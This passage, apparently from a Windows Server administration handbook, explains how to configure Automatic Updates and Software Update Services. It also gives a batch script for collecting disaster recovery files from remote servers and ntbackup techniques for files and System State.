+updates is displayed and you can download and/or install only
+the updates you choose by deselecting the updates you want to
+decline. If you choose the third option, everything is automatic.
+Which approach is best? While keeping your systems up-to-date
+with the latest patches is important, there have been occasions
+when a patch has broken one feature while fixing another,
+resulting in systems freezing up or becoming unstable. On
+critical servers, it's probably best to download updates
+automatically but not install them until you've had a chance to
+install them on a test machine to ensure that no system
+problems or application incompatibilities result. We'll talk about
+how you can do this in a moment.
+There's another reason for not using the fully automated option
+on critical servers: Microsoft sometimes releases multiple
+patches at a time, and if you install all of them and the machine
+becomes unstable, it's hard to trace which patch caused the
+problem. I suggest that when multiple patches become available
+and you've tested them, use the following hack to safely install
+them on your critical servers.
+First, click the Automatic Updates notification icon in the status
+area and click Details to display a list of available updates, as
+
+shown in Figure 9-4. Deselect all the patches in the list except
+the one you want to install first. This will download and/or install
+only the selected patch (if you're installing updates that have
+already been downloaded, it will delete all other downloaded
+updates from your system). Note that the declined patches will
+not be displayed in future lists generated by Automatic Updates,
+but by clicking the Declined Updates button (see Figure 9-3
+again) you can choose to have Windows notify you again about
+the updates you declined so you can download/install them later.
+Once you've installed the first update on your production
+system and verified it hasn't caused any negative effect, repeat
+the process to install the second update, third update, and so
+on.
+Figure 9-4. List of downloaded updates ready to
+be installed
+
+The main downside of this hack is that your system might
+require extra reboots. The advantage is that it's safer and helps
+you pinpoint the source of any problems that arise. For more
+details on how to keep Windows systems patched and up-to-
+date, see [Hack #79].
+To remove an installed update that's
+
+causing problems, go to Control Panel
+Add or Remove Programs
+Change or Remove Programs and uninstall
+the offending update.
+Hacking Automatic Updates
+While basic configuration of Automatic Updates is done through
+the GUI, you can tweak it further by hacking the Registry. This
+approach is useful mainly in a workgroup environment; to learn
+how to configure Automatic Updates in an Active Directory
+environment, see [Hack #87].
+To configure Automatic Updates by hacking the Registry, run
+regedit.exe and find the following key:
+HKLM\Software\Policies\Microsoft\Windows
+Under this key, add a subkey named WindowsUpdate, and under
+that key add a subkey named AU:
+HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
+Then, populate this key the following values and assign them
+data values as desired (all of them are of type Reg_DWORD). First,
+the NoAutoUpdate value determines whether Automatic Updates is
+enabled (0) or disabled (1) on your system. The AUOptions value
+then determines which of the three scheduling options is used: a
+
+value of 2 causes Windows to notify you before downloading
+updates, a value of 3 automatically downloads updates but
+notifies you before installing them, and a value of 4 automatically
+downloads and installs updates without user intervention.
+The ScheduledInstallDay value determines the day on which
+downloaded updates are installed when AUOptions has a data
+value of 4. A value of 0 for ScheduledInstallDay means that
+downloaded updates are installed every day, while values 1
+through 7 mean that updates are installed once a week on
+Sunday (1) through Saturday (7), respectively. The
+ScheduledInstallTime value determines the time on which
+downloaded updates are installed when AUOptions has a data
+value of 4. ScheduledInstallTime can have any integral data value
+from 0 through 23, representing the hours of midnight through 11
+p.m., respectively.
+The offset time, in minutes, that Automatic Updates waits after
+the computer restarts before it tries installing overdue updates
+is determined by RescheduleWaitTime and can range from 1 to 60 (1
+is the default). The NoAutoRebootWithLoggedOnUsers value
+determines whether Automatic Updates is allowed to reboot (0)
+or prevented from rebooting (1) the machine to complete the
+installation of updates when a user is currently logged on to the
+machine. Note that if you set the value of
+NoAutoRebootWithLoggedOnUsers to 1, Automatic Updates won't be
+able to check the Windows Update site for new updates until the
+system is rebooted.
+Finally, if UseWUServer is set to 1, the computer will obtain updates
+from an internal SUS server instead of from the Windows Update
+web site. Note that this value applies only when Software Update
+Services (SUS) is being used to deploy critical updates across
+your network.
+
+Once you've made these Registry modifications, they won't take
+effect until you reboot your machine. After rebooting, if you try to
+configure Automatic Updates using the GUI, you'll see that all
+the options are grayed out, even if you're an administrator. Don't
+worry, though; just delete the
+HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate key and
+its contents, reboot, and you'll again be able to configure
+Automatic Updates by using the GUI!
+
+Hack 87 Use Group Policy to Configure
+Automatic Updates
+Use Group Policy to simplify the configuration of Automatic
+Updates in an Active Directory environment.
+Configuring Automatic Updates [Hack #86] is a lot of work if you
+have to do it separately on every machine on your network.
+Fortunately, in an Active Directory environment, you can use
+Group Policy to simplify the job.
+First, open an existing Group Policy Object (GPO), such as the
+Default Domain Policy, or create a new GPO and link it to the
+appropriate domain, organizational unit (OU) or site. Then, add
+the wuau.adm template to the GPO so that the Group Policy
+settings for Automatic Updates will be added to your GPO. This
+is done as follows (note that these steps are unnecessary if you
+have Windows Server 2003). Begin by expanding Computer
+Configuration to show Administrative Templates. Then, right-
+click on Administrative Templates, select Add/Remove
+Template, click Add, select wuau.adm from the list of templates
+in the %Windir%\Inf folder, click Open, and then click Close.
+Now, configure the GPO settings for Automatic Updates by
+expanding Computer Configuration Administrative
+Templates Windows Components and selecting Windows
+Update in the pane on the left, as shown in Figure 9-5.
+
+Figure 9-5. Using Group Policy to configure
+Automatic Updates
+Let's dig into what the various settings in Figure 9-5 mean. The
+first setting, "Configure Automatic Updates," lets you perform
+basic configuration of Automatic Updates for computers in the
+domain, OU, or site to which the GPO is linked. The options here
+
+are the same as the options available when you manually
+configure the feature using Control Panel's Automatic Updates
+utility (Windows 2000) or System utility (Windows Server 2003
+and Windows XP); refer to Figure 9-3 for details. The next
+setting, "Specify intranet Microsoft update service location,"
+applies only if you plan on using Software Update Services
+(SUS) to deploy updates.
+The "Reschedule Automatic Updates schedule installations"
+option determines the time that Automatic Updates will wait
+after the computer restarts before installing updates that have
+already been downloaded and are past the scheduled time for
+installation. Value ranges from 1 to 60 (values are in minutes);
+the default is 1 if the setting is not configured and 5 when the
+policy is enabled. By disabling this policy, the installation of
+overdue updates is deferred until the next scheduled installation
+day and time.
+Finally, "No auto-restart for scheduled Automatic Updates
+installations" determines whether the logged-on user will be
+forcibly logged off in order to complete the installation process
+when a reboot is required. Enabling the policy means that
+machines will not be forcibly rebooted. While this would seem
+like a good idea (so users won't lose their work), it does have a
+downside: Automatic Updates won't be able to check the
+Windows Update web site for new updates until the machine is
+rebooted.
+Enabling these policy settings will override any configuration of
+Automatic Updates that was done locally using Control Panel
+and will prevent you from making such changes locally, even as
+an administrator (the options in the properties sheet of Figure 9-
+3 would be grayed out). However, changing these policy settings
+back to Not Configured will restore the manual settings
+previously configured for Automatic Updates (though a reboot is
+required). And while changes made to these policies are
+
+automatically applied to client computers every 90 minutes
+(plus a random offset of up to 30 minutes), you can test the
+settings immediately by forcing a policy refresh with the
+command secedit /refreshpolicy machine_policy on Windows
+2000 or gpupdate /force on Windows Server 2003.
+Some Recommendations
+If you want to configure different Automatic Updates policies for
+different users or computers, either create multiple GPOs, link
+each to a different OU, and place users and computers into
+these OUs accordingly, or filter the GPO settings to prevent
+their inheritance by specific users, computers, or groups.
+You can also check the Security log in Event Viewer if you want
+to see whether the machine has been rebooted to install
+scheduled updates. Look for the following Event IDs:
+Event ID 21
+"Restart Required: To complete the installation of the
+following updates, the computer must be restarted. Until
+this computer has been restarted, Windows cannot
+search for or download new updates."
+Event ID 22
+"Restart Required: To complete the installation of the
+following updates, the computer will be restarted within
+five minutes. Until this computer has been restarted,
+Windows cannot search for or download new updates."
+
+Digging Deeper
+There's another policy that controls how Automatic Updates
+works, but it's not found under Computer Configuration. Instead,
+it's found in User Configuration Administrative Templates
+Windows Components Windows Update "Remove
+access to use all Windows Update features."
+This policy prevents the currently logged-on user from opening
+the Windows Update web site in Internet Explorer, in order to
+manually download and install updates on his machine. Actually,
+when you open windowsupdate.microsoft.com, an "Access
+Denied" page appears, explaining that a policy is preventing you
+from using the site. Enabling this policy also has the effect of
+preventing Automatic Updates from notifying users when new
+updates are ready to install. In other words, no notification icon
+will appear in the status area to inform you that updates are
+ready to install. Finally, even local administrators on the
+machine are affected by this policy! And domain administrators
+are affected too!
+So, why would you want to use this policy? While it prevents
+users from visiting Windows Update or interacting with Windows
+Update, it doesn't prevent Automatic Updates from operating if
+the feature has been configured at the computer level by using
+the policies discussed in the previous section. This is because
+this setting is a per-user policy, not a per-machine one, so it
+affects only users; it doesn't affect configuration done at the
+machine level.
+Enabling this policy might be a good idea, because it prevents
+users from trying to download and install updates on their own,
+even if they have administrative privileges.
+
+While this policy is present on Windows
+2000, Microsoft says it works only on
+Windows XP and Windows Server 2003.
+But my own experience is that it also
+works on Windows 2000.
+While this policy prevents users from using the Windows Update
+site, it still leaves the Windows Update icon in the Start menu,
+tempting users to explore and see what it does. You can remove
+this icon from the Start menu by enabling another policy: User
+Configuration Administrative Templates Start Menu &
+Taskbar "Disable and remove links to Windows Update."
+This removes even users' temptation to try to keep their
+machines up-to-date by themselves. Administrators would do
+well to use such policies and to explore similar restrictions on
+user activity provided by Group Policy.
+
+Hack 88 Automatic Updates FAQ
+Rod Trent of myITforum.com shares his answers to some
+frequently asked questions about the Automatic Updates
+feature of Windows 2000/XP/2003.
+As CEO of myITforum.com (http://www.myitforum.com), I often
+get technical questions about Automatic Updates and other
+Microsoft patch-management tools. Here are a few of the more
+common questions and my answers. You can find additional tips
+about using Automatic Updates at myITforum.com.
+Service Still Running After Disabling
+AutoUpdate
+Q: I've disabled Automatic Updates by going to AutoUpdate
+properties in the Control Panel, double-clicking System Properties,
+and then clicking the Automatic Updates tab. But the AutoUpdate
+service still runs. Can this be turned off?
+A: AutoUpdate is an always-on service. Disabling this service by
+accessing the properties disables only the client behavior.
+Disabling Critical Update Notification
+
+Q: How do I disable the Critical Update Notification feature of
+Automatic Updates?
+A: The Critical Update Notification is controlled through the
+Task Scheduler. If you want to disable the Critical Update
+notification but keep it installed on the computer, open the Task
+Scheduler and delete any tasks for Critical Update Notification.
+For Windows XP and Windows 2003, scheduled tasks are
+accessed under Program Files Accessories System
+Tools Scheduled Tasks. In Windows 2000, however, Task
+Scheduler is available under Settings Control Panel
+Scheduled Tasks.
+AU Overrides WU
+Q: If you use the Windows Update web site on a machine that has
+Automatic Updates enabled, what is the result?
+A: Automatic Updates might try to install updates, even though
+the Windows Update web site was used. Unfortunately,
+Automatic Updates is not smart enough to understand when
+you've decided to use Windows Update instead. When updates
+are downloaded via Automatic Updates, the download
+information is stored on the local computer, and this information
+doesn't change if an update is installed afterward.
+Note that Automatic Updates will still display a message that
+updates are available. This will be fixed in a future version of
+Automatic Updates, but for now, install the Automatic Updates
+version of the update, so its installation records are updated
+correctly. The "you have updates" message will go away once
+the updates are installed using the Automatic Updates client.
+
+Rod Trent
+
+Hack 89 Software Update Services FAQ
+Rod Trent of myITforum.com shares his answers to some
+frequently asked questions regarding Software Update Services
+(SUS).
+Software Update Services (SUS) is a free patch-management
+product you can download from Microsoft's web site
+(http://www.microsoft.com/windowsserversystem/sus/). SUS is
+an excellent solution for keeping small and mid-sized corporate
+networks up-to-date with patches released by Microsoft. For
+large enterprise networks, I recommend using Systems
+Management Server (SMS) as a complete solution.
+Here are some common SUS questions and my answers. For
+more entries from the Software Update Services FAQ, search for
+"Software Update Services" at myITforum.com
+(http://www.myitforum.com).
+Operating System Support
+Which operating systems are supported under SUS?
+SUS is supported on the following Microsoft Windows platforms:
+Microsoft Windows 2000 Professional (with SP2 or later)
+Microsoft Windows 2000 Server (with SP2 or later)
+Microsoft Windows 2000 Advanced Server (with SP2 or
+
+later)
+Microsoft Windows XP Professional
+Microsoft Windows XP Home Edition
+Microsoft Windows Server 2003
+Older versions of Microsoft Windows, including 95, 98,
+NT, and ME, are not supported by SUS.
+Active Directory Support
+Q: Is Active Directory required for SUS to work?
+A: No, it's not required. However, SUS works well with Active
+Directory.
+Separating Workstations and Servers
+Q: How can you approve different update lists for workstations and
+servers?
+A: If you need different approved lists for workstations and
+servers, install two different SUS servers in your environment:
+one specifically for workstations and one just for servers.
+Control Panel Icon
+Q: My Automatic Updates service is running in Services. But in
+Control Panel, there is no Automatic Updates icon. I am running
+Windows XP SP1.
+
+A:Windows XP Automatic Updates is not available in the Control
+Panel. Instead, it has its own tab in My Computer Properties.
+Approving Updates After First
+Synchronization
+Q: I just installed SUS and downloaded the horde of old updates.
+How do I handle these? Is there some way to remove them? Or do I
+need to approve them all?
+A: Go ahead and approve all updates. If the computers already
+have the specific updates installed, they will ignore them. This
+allows you to put all old updates into the list of already approved
+updates so that you can filter them out.
+Downloading and Testing Updates
+Q: I see the downloaded updates in the SUS\Content\Cabs directory,
+but how can I install a specific update for testing without knowing
+the Q-number associated with a bulletin?
+A: Instead of spending a lot of time trying to associate a Q-
+number with the downloaded filename, use SUSAdmin to
+download the specific update you want. Simply open SUSAdmin
+by using the URL http://SUSServerName/SUSAdmin and click
+the Approve Updates link. Locate the update you want to test
+and click the Details link. When the Details windows displays,
+click on the filename link. This downloads the update executable
+to your computer, where you can test the installation.
+
+Order of Updates
+Q: Do I need to worry about patching out of order through SUS?
+A: The installation is done on the client side (Automatic
+Updates) and there is no particular order enforced, but it should
+work correctly in whatever order the installs are done. The
+functionality of the old qchain.exe is built into the current
+update.exe that is used to install patches, and it is supposed to
+be smart enough to not overwrite newer binaries with older ones.
+Detecting Connection
+Q: How can I tell if my system is connecting to the SUS server?
+A: Check the SUS log file on your system, at
+%systemroot%\Windows Update.log.
+Knowing When the Server Is Synching
+Q: How do I know if my SUS server is synching?
+A: Open Task Manager and switch to the Processes tab. Locate
+a process called WUSyncSvc.exe. If your SUS server is currently
+synching updates, this process will be loaded and active. Also,
+the Software Update Services Synchronization Service will be
+started and running in the list of computer services.
+Cleaning the Updates Directory
+
+Q: I have uninstalled SUS due to a full hard drive, but the drive
+remains full. Is there something else I need to delete?
+A: SUS does not remove the synchronized updates during the
+uninstall. You'll need to remove the files located in the
+SUS\Content\Cabs directory manually.
+Modifying SUS IIS Rights
+Q: I modified the rights for the SUS and SUS\Content\Cabs folders
+and now clients cannot download updates. What should these rights
+be set to?
+A: Set anonymous access on the IIS root of the SUS server and
+give access to the Everyone group.
+Analyzing the SUS Log Files
+Q: Is there a tool/utility that can parse the SUS IIS log file and
+create any sort of readable report?
+A: There is a standalone SUS Reporting Utility tool you can use.
+An online version is located at
+http://www.susserver.com/Software/SUSreporting/.
+TimeExpire
+Q: Have you seen the following line in the patchinstall.log file when
+you send multiple security patches in the same package?
+
+TimeExpire: Sending Command1 message, CurrentTime = (14900746),
+StartTime = (14879725)
+A: This is not an error. It means that the countdown timer
+expired without the user selecting any option and the system is
+now taking the default action (reboot, install, or postpone).
+Entries before or after this line should shed more light as to what
+was done.
+SUS and Name-Resolution Issues
+The clients connect OK, and they receive notification that
+updates are ready to download. I then click the icon to receive a
+list of updates that are needed. When I click the "Start
+Download" button, the window disappears and nothing happens.
+Any ideas?
+This particular issue is because a result of a name-resolution
+problem. Create an LMHOST file entry pointing to the SUS server.
+Then, the downloads and installations should proceed as
+expected.
+SUS Feedback
+Q: Is there an email alias for submitting comments, suggestions,
+and requests for SUS directly to Microsoft?
+A: Yes. You can email cwufdbk@microsoft.com. You might not
+receive a direct response, but Microsoft does monitor this
+mailbox.
+
+Rod Trent
+
+Chapter 10. Backup and
+Recovery
+Hacks #90-100
+Section 90. Collect Disaster Recovery Files
+Section 91. Back Up Individual Files from the Command
+Line
+Section 92. Back Up System State on Remote
+Machines
+Section 93. Back Up and Restore a Certificate
+Authority
+Section 94. Back Up EFS
+Section 95. Work with Shadow Copies
+Section 96. Back Up and Clear the Event Logs
+Section 97. Back Up the DFS Namespace
+Section 98. Recover with Automated System Recovery
+Section 99. Recovery Roadmap
+Section 100. Data Recovery of Last Resort
+
+Hacks #90-100
+Backing up systems and configurations for services is your first
+line of defense against a disaster. Unfortunately, this is often
+more complicated than it sounds. Restoring an entire system
+from scratch is usually a complex and time-consuming
+procedure, and it is usually not necessary when only one
+component or feature has become corrupted or lost.
+This chapter looks at the backup process and examines how to
+back up specific entities, such as your System State, certificate
+authority (CA) information, Encrypting File System (EFS) keys,
+and Distributed File System (DFS) namespace. We also look at
+how to back up something as simple as an individual file from the
+command line, to something as complicated as an entire system
+using the new Automated System Recover (ASR) feature of
+Windows Server 2003. Also included is a script that can be used
+to collect disaster recovery files and event logs from remote
+Windows 2000 servers.
+We also map out procedures you can use to recover a failed
+system, short of restoring everything from backup, navigating
+through a maze of options (such as Safe Mode, Emergency
+Repair, Last Known Good Configuration, and the Recovery
+Console). Finally, we mention a few services you can call on
+when your worst nightmare happens and you need to recover
+your business data from a failed disk that has no backup.
+
+Hack 90 Collect Disaster Recovery Files
+Use this handy script to gather emergency repair files and event
+logs from Windows 2000 servers on your network.
+Collecting Emergency Repair (ER) files can be a tedious, time-
+consuming, and often forgotten task for Windows 2000
+administrators. Usually, the lowest man on the totem pole gets
+this responsibility only after a server goes down, when the easy
+fix would have been to use the ER diskette but an updated ER
+diskette was unavailable, leaving the server down for hours.
+Management then begins searching for a GUI-based product
+that will collect ER files and simplify everyone's life. Companies
+like Aelita charge $99 per server to collect ER disks from a
+remote server and charge $599 per server to collect remote
+event logs. If you follow this hack, you'll learn how to script the
+collection of ER files and event logs from remote servers for free.
+The script runs an update of the system's Emergency Repair
+files using rdisk.exe, uses the built-in winmsd.exe utility to save
+system information, and uses the following Microsoft Windows
+NT/2000 Server Resource Kit tools:
+srvinfo.exe
+To collect more information about the system
+
+srvcheck.exe
+To audit shares and security settings
+dumpel.exe
+To save information from the system's event logs.
+After it collects all this information, the script copies it to the
+repository server. If you schedule the script to run at least once
+a month, you'll have most of the information you need to restore
+the system in the event of a failure. In my environment, I run the
+script every Sunday evening.
+When choosing a suitable repository server, make sure the
+machine has enough hard-drive space to hold all the disaster
+recovery files. I run this script against 70 servers and use 650
+MB of space. An NT 4 server machine will use about 1.5 MB of
+space on your hard drive, and a Windows 2000 Server will use
+about 20 MB of space. If you can, run the script on a Windows
+2000 machine, because using UNC path names are easier,
+srvinfo.exe will work properly, and the script can be scheduled to
+run under a different user account.
+The Code
+There are four separate files you need for running this hack:
+Disaster.bat, PassList.bat, ReadList.bat, and ServerList.txt.
+Following is the code for each of them; instructions on how to
+customize them for your own environment are covered in the
+next section.
+
+Disaster.bat
+REM ***********************
+REM Author: David Jaffe
+REM Runs Disaster Recovery Commands On Servers.
+REM Version 1.1
+REM Will Break Out NT 4 Servers From Windows 2000 Servers In Next Version
+REM ***********************
+If "%OS%"=="Windows_NT" goto MAIN
+If not"%OS%"=="Windows_NT" goto DOSEXIT
+:MAIN
+REM This copies ERD files from the target computer to a central repository
+net use Q: \\%1\c$
+c:\winnt\system32\xcopy.exe q:\winnt\repair\*.* e:\erd\%1\ /q /r /h /y
+net use Q: /delete /y
+
+REM Collect Services and Driver details plus more info about the server. Writes the REM
+text file to the folder where the script ran from.
+winmsd \\%1 /a /f
+REM Collects Basic Info about remote target. Writes a text file to the folder where the
+script ran from.
+srvinfo -ns \\%1 >srvinfo.txt
+REM Collects Shares and security settings. Writes a text file to the folder where the
+script ran from.
+srvcheck \\%1 >shareinfo.txt
+REM Collects all event logs and writes text files for each node. Writes the REM text file
+
+to the folder where the script ran from.
+dumpel -f eventsys.txt -s \\%1 -l system
+dumpel -f eventapp.txt -s \\%1 -l application
+dumpel -f eventsec.txt -s \\%1 -l security
+REM Copies and deletes all text files found in the folder the script ran from.
+REN serverlist.txt serverlist.doc
+copy c:\erdscript\*.txt e:\erd\%1\
+DEL c:\erdscript\*.txt
+:DOSEXIT
+echo
+echo This Program Requires NT 4 Or 2000 Server To Run
+echo
+ReadList.bat
+
+REM Reads The ServerList.txt And Passes The Names to Passlist.bat
+REN serverlist.doc serverlist.txt
+for /F %%A in (c:\erdscript\serverlist.txt) do (call c:\erdscript\passlist.bat %%A)
+PassList.bat
+REM Runs The Commands Listed In Disaster.bat Incremmentally On Each Machine Listed In
+ServerText.txt
+c:\erdscript\Disaster.bat %1
+ServerList.txt
+servernameA
+servernameB
+servernameC
+servernameD
+servernameE
+
+and so on.......
+Running the Hack
+To make the script work in your network, download the files from
+http://www.oreilly.com/catalog/winsvrhks/ (there is also an NT
+version of the scripts, if you still have NT servers running on
+your network and want to collect ER information from them as
+well) into a directory named ERDSCRIPT on the repository server.
+Then, customize the code in each file as follows for your own
+networking environment.
+Disaster.bat
+Change all path statements to reflect where you want the
+disaster recovery files stored. The current script copies
+everything to e:\erd\%computername% and locates all executables
+at c:\erdscript, so you should modify these according to your
+own environment.
+ReadList.bat
+The lines c:\erdscript\serverlist.txt and call
+c:\erdscript\passlist.bat %%A should be changed to reflect the
+path and folder the files were unzipped to.
+
+PassList.bat
+The line c:\erdscript\Disaster.bat %1 should be changed to
+reflect the path and folder the files were unzipped to.
+ServerList.txt
+List all servers from which you want to collect disaster recovery
+files. Use one machine name per line.
+Conclusion
+Using some basic scripting knowledge, you have protected your
+organization from extended down times and possibly thousands
+of dollars wasted on a GUI version of this script. Take a look at
+the following figures to see how you could increase your
+department's bottom line and take a step forward in your career:
+Aelita ERDisk = $99.00
+Aelita EventAdmin = $599.00
+Total money spent on just 1 server = $698.00
+Total money spent on 50 servers = $34,900.00
+Total time spent implementing a free script = Half a day
+The look on the boss's face when you ask for a raise and then
+present proof on how much money you just saved the company =
+priceless!
+
+David Jaffe
+
+Hack 91 Back Up Individual Files from
+the Command Line
+You can't back up individual files using the ntbackup command,
+but there's a workaround.
+The normal syntax of the ntbackup command in Windows 2000
+and Windows Server 2003 lets you select specific folders to
+back up, but it doesn't let you select specific files. For example,
+to back up your C:\data folder as D:\backups\031105.bkf you
+would type the following at the command line (where /j indicates
+the descriptive name of the backup job and /f means we're
+backing up to file instead of to tape):
+ntbackup backup C:\data /j "Nov 5 2003 backup of Data folder" /f D:\backups\031105.bkf
+But what if you want to back up an individual file in the \data
+folder but not the entire folder? This is easy to do using the GUI
+version of the Backup tool. Just start the tool, switch to the
+Backup tab (click Advanced Mode when the wizard starts in
+Windows Server 2003), expand the C: drive, select the \data
+folder, and check off the specific files you want to back up.
+However, doing this from the command line presents a problem,
+because the syntax of ntbackup doesn't allow you to specify files.
+There is, however, a workaround: you can specify the names of
+the specific files you want to back up in a backup selection
+(*.bks) file (also called a script selection file) and use the @
+symbol to specify this file in your ntbackup command, as follows
+
+(where filename.bks is your backup selection file):
+ntbackup backup @filename.bks /j "Nov 5 2003 backup of Data folder" /f D:\backups\031105.bkf
+The problem is, you can't create a .bks file from the command
+line; you have to do it from the GUI.
+Creating a .bks file
+To create a .bks file using the Backup utility, you simply create a
+backup job with the selected files you want to back up and then
+save the job without actually running it. Then, you can copy the
+.bks file to another location and use ntbackup to back up the files
+from the command line.
+For example, say the folder C:\data contains three
+filesproducts.doc, sales.doc, and reports.docand you want to back
+up only products.doc from the command line. Start the Backup
+utility (switch from the wizard to advanced mode in Windows
+Server 2003), expand the folder tree, and check the box beside
+products.doc, as shown in Figure 10-1.
+Figure 10-1. Using Backup to create a backup
+selection file
+
+Now, simply select Jobs Save Selections to create your .bks
+file (specifying a filename like onefile.bks), and close the Backup
+utility. By default, any .bks files you create are stored in your
+user profile in the C:\Documents and Settings\username\Local
+Settings\Application Data\Microsoft\Windows NT\NTBackup\Data
+folder. To see this hidden folder in Windows Explorer, select Tools
+Folder Options View "Show hidden files and
+
+folders."
+When you open onefile.bks using Notepad, it contains one line of
+text:
+C:\data\products.doc
+Now, copy onefile.bks to a directory with a shorter path, like
+C:\BKS, since you don't want to have to type C\Documents and
+Settings\...\Data at the command line. Now you can back up the
+single file products.doc from the command line as follows:
+ntbackup backup @C:\BKS\onefile.bks /j "Nov 5 2003 backup of Data folder" /f D:\backups\
+031105.bkf
+Make sure you don't forget the @ sign
+before your .bks file; if you do, the backup
+will fail without warning (a backup-job file
+will be created, but you won't be able to
+restore from it). Also, be sure to enter the
+absolute path for the .bks file, because
+relative paths aren't supported.
+Hacking the .bks file
+We've seen how easy it is to back up individual files using
+
+ntbackup, by first using the GUI Backup utility to create a .bks
+file. Once you've created such a file, it's easy to hack it using a
+text editor such as Notepad, because its syntax is easy to
+understand. In fact, its syntax is so simple you can simply
+create a .txt file containing the right information and then rename
+it with a .bks extension, instead of using Backup to create the
+.bks file first. In other words, it gets even easier!
+Anyway, if we start with our existing file, onefile.bks, and later
+decide that we want to back up both the products.doc and
+sales.doc files, all we need to do is add a second line to the file,
+to make it read as follows:
+C:\data\products.doc
+C:\data\sales.doc
+You can also use your .bks file to back up entire folders or
+volumes by adding their paths to the file, as follows (you should
+include the backslash at the end of your volume or folder):
+E:\
+F:\budgets\
+You can also back up the System State information on your
+server by adding the following line (make sure there is no space
+between the words System and State):
+SystemState
+You can also back up shared folders by specifying their UNC
+path:
+\\SERVER7\Docs
+You can even back up a subfolder within a share (again, note the
+
+trailing backslash):
+\\SERVER7\Docs\Latest\
+Finally, you can back up a volume or folder and exclude certain
+files or folders. For example, the following .bks file backs up the
+entire C:\data folder with the exception of products.doc:
+C:\data\
+C:\data\products.doc /exclude
+Creating and customizing .bks files this way gives you a lot of
+flexibility for performing backups from the command line.
+Unfortunately, neither the ntbackup command nor .bks files
+support the use of wildcards. Perhaps we'll see that support in
+Longhorn (http://msdn.microsoft.com/longhorn/).
+
+Hack 92 Back Up System State on
+Remote Machines
+Here's a hack that let's you use the Backup utility to perform a
+network backup of System State information on remote
+computers.
+The term System State is used in Windows 2000 and later to
+describe various information used to boot, configure, and run the
+operating system. At a minimum, System State consists of the
+Registry, boot files, the COM+ class registration database, and
+any system files running under Windows File Protection. Servers
+might have additional System State information, depending on
+their role. For example, on a domain controller, System State
+also includes the Active Directory directory service database
+and the contents of the SYSVOL directory, but if the domain
+controller is also a DNS server, then System State includes the
+DS-integrated DNS zone data as well. And if a server is running
+IIS, then its System State normally includes the IIS metabase
+as well [Hack #54].
+Backing up System State information is critical for recovery from
+a disaster, and using the Backup utility, it's easy to back up the
+System State of the local machine. From the GUI, simply start
+the utility (Accessories System Tools Backup), switch
+to Advanced Mode if your machine is running Windows Server
+2003, switch to the Backup tab, select the checkbox labeled
+System State (see Figure 10-2), and configure the remaining
+
+backup options as required. The usual practice is also to back
+up your boot and system volumes when you back up System
+State, to ensure you have enough information to recover your
+system after a disaster.
+Figure 10-2. Backing up System State on a
+domain controller
+Note that the checkboxes for the various components of System
+State are grayed out in Figure 10-2. This is because System
+State information is interdependent, so you can't back up or
+
+restore parts of it; you can restore the System State in its
+entirety only. After all, it would be useless to back up the
+directory service database if you didn't also back up Registry
+keys associated with the service!
+Backing up System State from the command line is even
+simpler: just include the systemstate option in your ntbackup
+command. For example, to back up the System State data to file
+as D:\backups\101103.bkf using 10 November 2003 as the name
+for your backup job, type the following at a command prompt (or
+include it in a batch file):
+ntbackup backup systemstate /j "10 November 2003" /f "D:\backups\101103.bkf"
+The Windows help documentation says that the Backup utility
+(and its command-line equivalent, ntbackup) can be used only to
+back up the System State of the local computer. This is
+unfortunate, because backing up System State is critical for
+server-recovery purposes. It would be nice if you could back up
+System State for remote machines over the network, instead of
+having to do it locally on each server. Fortunately, there's a
+workaround you can use to accomplish this. It's a two-step
+process that involves configuring a backup job locally on the
+remote machine and then configuring a network backup to run
+from your local server that has the tape drive attached.
+Configuring Backup on the Remote
+Machine
+First, go to the remote server whose System State you want to
+back up and log on as a domain administrator or member of the
+Backup Operators group for the domain. Create a new folder on
+the server and share it using a name like Sysback; this folder will
+
+be used as a temporary in-transit location for storing a backup
+of the server's System State, so configure NTFS permissions on
+the folder so that only members of Domain Admins and Backup
+Operators have access to it.
+Now, start the Backup utility on the server and configure it to
+back up the System State to file (not tape) so that the backup-
+job file (*.bkf) is saved in the Sysback share you created earlier.
+Choose the appropriate backup options and schedule the backup
+to occur at desired intervals.
+Configuring Backup on the Local Machine
+Return to your local server (the one with the tape drive attached)
+and map a drive to the Sysback share on the remote server. You
+could do this by right-clicking on My Computer and selecting
+Map Network Drive, or you could do it from the command line
+using the net use command, whichever you prefer.
+Now, start Backup on the local machine and configure it to
+include the mapped drive as part of your backup job. The
+mapped drive will be displayed in the Backup utility with a
+checkbox beside it; just select the checkbox to back it up.
+Finish configuring backup options and schedule your job to run
+at desired intervals. Now, when the backup job runs on the local
+machine, it will back up the System State of the remote machine
+as desired, provided you coordinate your schedules so that the
+backup job runs first on the remote machine.
+Of course, you can also use ntbackup to configure your backup
+jobs from the command line, if desired. And if Terminal Services
+(Remote Desktop in Windows Server 2003) is running on the
+remote server, you could configure the remote job without
+actually having to walk over to where the remote machine
+
+resides.
+Evaluating This Approach
+You may or may not want to use this approach to back up the
+System State of your remote servers. Local backups (using a
+tape drive attached to each server) certainly cost more in terms
+of hardware and are more work to administer, but they don't have
+the single point-of-failure problem that network backups (using a
+centralized backup server with attached tape drive) might
+experience. And while network backups can generate
+considerable network traffic, by scheduling backups to take
+place during off hours or by using a dedicated second LAN, you
+can minimize this issue. Like most decisions administrators
+have to make concerning their networks, it's a tradeoff.
+By the way, this hack also shows that you can use the Backup
+utility to back up the Registry on remote computerssomething
+else Windows help says you can't do!
+
+Hack 93 Back Up and Restore a
+Certificate Authority
+Backing up your local Certificate Authority is essential, because
+it forms the foundation for public key cryptography (PKI) for
+your organization.
+If you're thinking of using IPSec in an enterprise environment to
+encrypt virtual private network (VPN) communications for your
+remote users, or if you're considering securing email
+communications in your enterprise by encrypting messages and
+signing them digitally, then chances are you've thought of
+deploying your own local Certificate Authority (CA) by using the
+Certificate Services component of Windows 2000 and Windows
+Server 2003. The advantage of doing this using Certificate
+Services, instead of letting a public third-party organization
+issue and manage it, is that it costs nothing; you can issue,
+manage, renew, and revoke digital certificates for users
+throughout your enterprise for free. However, the hidden cost of
+doing this is that you need to know what you're doing. In
+particular, what if something goes wrong with the server that
+functions as your root CA? Proper backups are the key, but
+knowing how to restore in different situations is even more
+important.
+At the heart of your certificate system is the root CA, which
+authorizes and validates all digital certificates issued by your
+enterprise. A small or mid-sized company will typically have
+only one CA, which functions as root CA and issues certificates
+
+for all users and systems on your network. A large enterprise
+might find this single-CA solution doesn't scale well enough and
+as a result might choose to deploy a hierarchy of CAs, with a
